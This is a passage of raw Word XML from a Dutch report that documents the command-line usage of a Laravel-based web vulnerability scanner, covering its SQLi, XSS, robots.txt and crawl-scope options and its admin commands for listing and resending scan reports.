          <w:p w14:paraId="409505FF" w14:textId="63226BEA" w:rsidR="00D070A0" w:rsidRDefault="00FF173E" w:rsidP="001456CE">
            <w:r>
              <w:t>Modificeren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3013CEAC" w14:textId="1D56B5D8" w:rsidR="00D070A0" w:rsidRDefault="00FC7C23" w:rsidP="0087298A">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> scan {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>} {opties}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3942" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02EC5775" w14:textId="3B3C520F" w:rsidR="00D070A0" w:rsidRDefault="00352BC7" w:rsidP="0087298A">
            <w:r>
              <w:t>Er wordt een gemodificeerde scan uit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3ADA23EB" w14:textId="0970DCF5" w:rsidR="009B4C60" w:rsidRPr="009B4C60" w:rsidRDefault="00613D52" w:rsidP="001456CE">
      <w:r>
        <w:t>Tabel</w:t>
      </w:r>
      <w:r w:rsidR="00266DB8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005722E6">
        <w:t>4.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56778921" w14:textId="726E2809" w:rsidR="00895A0E" w:rsidRDefault="00895A0E" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Opties</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2009"/>
        <w:gridCol w:w="1811"/>
        <w:gridCol w:w="3312"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D014A5" w14:paraId="1274E801" w14:textId="77777777" w:rsidTr="00D014A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F0BD284" w14:textId="33A2F653" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>Optie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="668AF697" w14:textId="00507DB9" w:rsidR="00914E09" w:rsidRDefault="00D8306B" w:rsidP="001456CE">
            <w:r>
              <w:t>Commando (optie)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2397D28B" w14:textId="6A94B905" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D014A5" w14:paraId="7C5EF913" w14:textId="77777777" w:rsidTr="00D014A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29F5291C" w14:textId="5E8B5F5B" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>SQL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="63554E80" w14:textId="0F2D226D" w:rsidR="00914E09" w:rsidRDefault="003A45B9" w:rsidP="001456CE">
            <w:r>
              <w:t>--s</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D36DA3C" w14:textId="7C22EFC5" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t xml:space="preserve">Scan op </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D014A5" w14:paraId="400A66D8" w14:textId="77777777" w:rsidTr="00D014A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62864077" w14:textId="523CF01F" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="66B2C545" w14:textId="518E59A2" w:rsidR="00914E09" w:rsidRDefault="003A45B9" w:rsidP="001456CE">
            <w:r>
              <w:t>--x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53640B18" w14:textId="5AB1811B" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>Scan op XSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D014A5" w14:paraId="34555E66" w14:textId="77777777" w:rsidTr="00D014A5">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A183F1D" w14:textId="06D4BFD0" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>robotTxt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D5E6961" w14:textId="5D1171DE" w:rsidR="00914E09" w:rsidRDefault="003A45B9" w:rsidP="001456CE">
            <w:r>
              <w:t>--r</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F3A22C9" w14:textId="7346C773" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RobotTxt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Glossay</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 19)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D014A5" w14:paraId="343F7A45" w14:textId="77777777" w:rsidTr="00D014A5">
        <w:trPr>
          <w:trHeight w:val="194"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2009" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BCFF920" w14:textId="2ACF4D47" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>Follow mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1811" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04537437" w14:textId="014A3F93" w:rsidR="00914E09" w:rsidRDefault="003A45B9" w:rsidP="001456CE">
            <w:r>
              <w:t>--</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3312" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14950723" w14:textId="29FDAFF1" w:rsidR="00914E09" w:rsidRDefault="00914E09" w:rsidP="001456CE">
            <w:r>
              <w:t>Volg modus, bepaald welke scope van het domein er wordt gecrawld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42D4A296" w14:textId="74D4F87B" w:rsidR="00895A0E" w:rsidRPr="0004778C" w:rsidRDefault="00803273" w:rsidP="001456CE">
      <w:r>
        <w:t>Tabel 4.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D2420E" w14:textId="5609259A" w:rsidR="00352BC7" w:rsidRDefault="00A906F7" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00FB2FD8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>tandaard scan</w:t>
      </w:r>
      <w:r w:rsidR="00FB2FD8">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252001280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4796AE81" wp14:editId="02315879">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-10160</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>286385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3911600" cy="215900"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270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standaard scan.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId50">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3911600" cy="215900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CCEDF1" w14:textId="77777777" w:rsidR="006B23D2" w:rsidRDefault="006B23D2" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787AA53C" w14:textId="07E98104" w:rsidR="00DC5B65" w:rsidRDefault="00CB6AE4" w:rsidP="001456CE">
      <w:r w:rsidRPr="00CB6AE4">
        <w:t>Configuratie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091DE768" w14:textId="3E1B83EC" w:rsidR="00325012" w:rsidRDefault="00325012" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4340D8" w14:textId="73CB72F3" w:rsidR="00325012" w:rsidRDefault="00325012" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0CC53" w14:textId="7EEBB676" w:rsidR="00325012" w:rsidRDefault="00325012" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>RobotTxt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F05DC92" w14:textId="272B74ED" w:rsidR="00325012" w:rsidRDefault="00325012" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Follow </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mode :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 0 – crawl alle URL’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D825C" w14:textId="77777777" w:rsidR="00A149D7" w:rsidRDefault="00A149D7" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Gemodificeerde scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D7E5DA" w14:textId="77777777" w:rsidR="004744E8" w:rsidRDefault="004744E8" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="418EB210" wp14:editId="4F89142D">
            <wp:extent cx="5461000" cy="215900"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270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scan commando met opties.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId51">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5461000" cy="215900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AB1CDD" w14:textId="77777777" w:rsidR="00304069" w:rsidRDefault="00304069" w:rsidP="00304069">
      <w:r w:rsidRPr="00CB6AE4">
        <w:t>Configuratie:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507F1CEE" w14:textId="77777777" w:rsidR="00304069" w:rsidRDefault="00304069" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3785BDB7" w14:textId="22F2B06C" w:rsidR="00304069" w:rsidRDefault="00A56266" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>XSS :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> nee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CBD47F" w14:textId="77777777" w:rsidR="00304069" w:rsidRDefault="00304069" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>RobotTxt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ja</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA7EC2F" w14:textId="506D2E0C" w:rsidR="00FE2268" w:rsidRPr="00E50670" w:rsidRDefault="00304069" w:rsidP="00212048">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="53"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Follow </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mode :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00A56266">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="004D1B8D">
        <w:t xml:space="preserve"> crawl </w:t>
      </w:r>
      <w:r w:rsidR="00E02BA8">
        <w:t>alleen URL’s naar de zelfde host</w:t>
      </w:r>
      <w:r w:rsidR="00337C2B">
        <w:t>. e.</w:t>
      </w:r>
      <w:r w:rsidR="00D45C4E">
        <w:t>g.</w:t>
      </w:r>
      <w:r w:rsidR="007C3474">
        <w:t xml:space="preserve"> c</w:t>
      </w:r>
      <w:r w:rsidR="00BD65E8">
        <w:t xml:space="preserve">rawlt alleen URL’s uit domein </w:t>
      </w:r>
      <w:r w:rsidR="00BD65E8" w:rsidRPr="00BD65E8">
        <w:t>www.voorbeeld.com</w:t>
      </w:r>
      <w:r w:rsidR="00BD65E8">
        <w:t xml:space="preserve"> niet www.test.voorbeeld.com</w:t>
      </w:r>
      <w:r w:rsidR="003E5DB0">
        <w:t xml:space="preserve"> (Bijlage A, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="003E5DB0">
        <w:t>PHPCrawl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="003E5DB0">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044B3249" w14:textId="77777777" w:rsidR="00B06F1A" w:rsidRPr="00B06F1A" w:rsidRDefault="00B06F1A">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B06F1A">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Beheren van scans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44269700" w14:textId="796C0E10" w:rsidR="001C6164" w:rsidRDefault="00DE3E5B">
      <w:r>
        <w:t>De commando’s “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>verzend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">” en “lijst” </w:t>
      </w:r>
      <w:r w:rsidR="00061EEF">
        <w:t>zijn gemaakt voor de administrator. Deze twee commando’s worden gebruikt om rapporten opnieuw te verzenden of</w:t>
      </w:r>
      <w:r w:rsidR="00327E8E">
        <w:t xml:space="preserve"> de poging tot verzenden</w:t>
      </w:r>
      <w:r w:rsidR="00216525">
        <w:t xml:space="preserve"> succesvol was of niet.</w:t>
      </w:r>
      <w:r w:rsidR="00B94459">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F360C9">
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F360C9">
        <w:t>CLI commando</w:t>
      </w:r>
      <w:r w:rsidR="00583257">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00282758">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00282758">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00583257">
        <w:t xml:space="preserve">worden gebruikt </w:t>
      </w:r>
      <w:r w:rsidR="006E116F">
        <w:t xml:space="preserve">als een vangnet voor rapporten die </w:t>
      </w:r>
      <w:r w:rsidR="000A5C03">
        <w:t>niet succesvol verzonden zijn</w:t>
      </w:r>
      <w:r w:rsidR="00706F17">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007E2A50">
        <w:t xml:space="preserve">De administrator heeft de verantwoordelijkheid om de rapporten te beheren en gebruikt de CLI als tool om dat mogelijk te maken. Als de administrator een rapport opnieuw wilt verzenden dan wordt er eerst een lijst opgevraagd met rapporten, dit </w:t>
      </w:r>
      <w:r w:rsidR="001C6164">
        <w:t>wordt gedaan met de “lijst” commando. De lijst commando produceert een lijst met de details van een rapport. De details bevatten</w:t>
      </w:r>
      <w:r w:rsidR="007E6A2E">
        <w:t xml:space="preserve"> de ID, naam en datum. De administrator kan dan zien om welke rapport het gaat. In het voorbeeld wordt rapport 47 opnieuw verzonden.</w:t>
      </w:r>
      <w:r w:rsidR="001C6164">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3045"/>
        <w:gridCol w:w="2928"/>
        <w:gridCol w:w="3942"/>
      </w:tblGrid>
      <w:tr w:rsidR="00312107" w14:paraId="167D2201" w14:textId="77777777" w:rsidTr="00B82BA5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3045" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C6DCC7D" w14:textId="77777777" w:rsidR="00312107" w:rsidRDefault="00312107" w:rsidP="00B82BA5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B4AB572" w14:textId="77777777" w:rsidR="00312107" w:rsidRDefault="00312107" w:rsidP="00B82BA5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Commando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3942" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C1FAEAD" w14:textId="77777777" w:rsidR="00312107" w:rsidRDefault="00312107" w:rsidP="00B82BA5">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312107" w14:paraId="1C38B05A" w14:textId="77777777" w:rsidTr="00B82BA5">
        <w:trPr>
          <w:trHeight w:val="306"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3045" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="598E3D47" w14:textId="77777777" w:rsidR="00312107" w:rsidRPr="0087298A" w:rsidRDefault="00312107" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Standaard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40D1C07C" w14:textId="6A65E08C" w:rsidR="00312107" w:rsidRPr="007770B0" w:rsidRDefault="00312107" w:rsidP="00B82BA5">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> verzend {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3942" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49D219E8" w14:textId="172BFE09" w:rsidR="00312107" w:rsidRPr="007A59CE" w:rsidRDefault="0025080D" w:rsidP="00312107">
            <w:r>
              <w:t>Verzend een rapport opnieuw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00312107" w14:paraId="60D0E35A" w14:textId="77777777" w:rsidTr="00B82BA5">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3045" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45D222B8" w14:textId="0C8E28CE" w:rsidR="00312107" w:rsidRDefault="00FF173E" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Modificeren</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="298AC543" w14:textId="2F8155C4" w:rsidR="00312107" w:rsidRDefault="00312107" w:rsidP="00312107">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> lijst</w:t>
            </w:r>
            <w:r w:rsidR="0025080D">
              <w:t xml:space="preserve"> {opties}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3942" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BBE5BB4" w14:textId="14FB344D" w:rsidR="00312107" w:rsidRDefault="003C55F6" w:rsidP="00B82BA5">
            <w:r>
              <w:t>Laat een lijst zien van</w:t>
            </w:r>
            <w:r w:rsidR="0025080D">
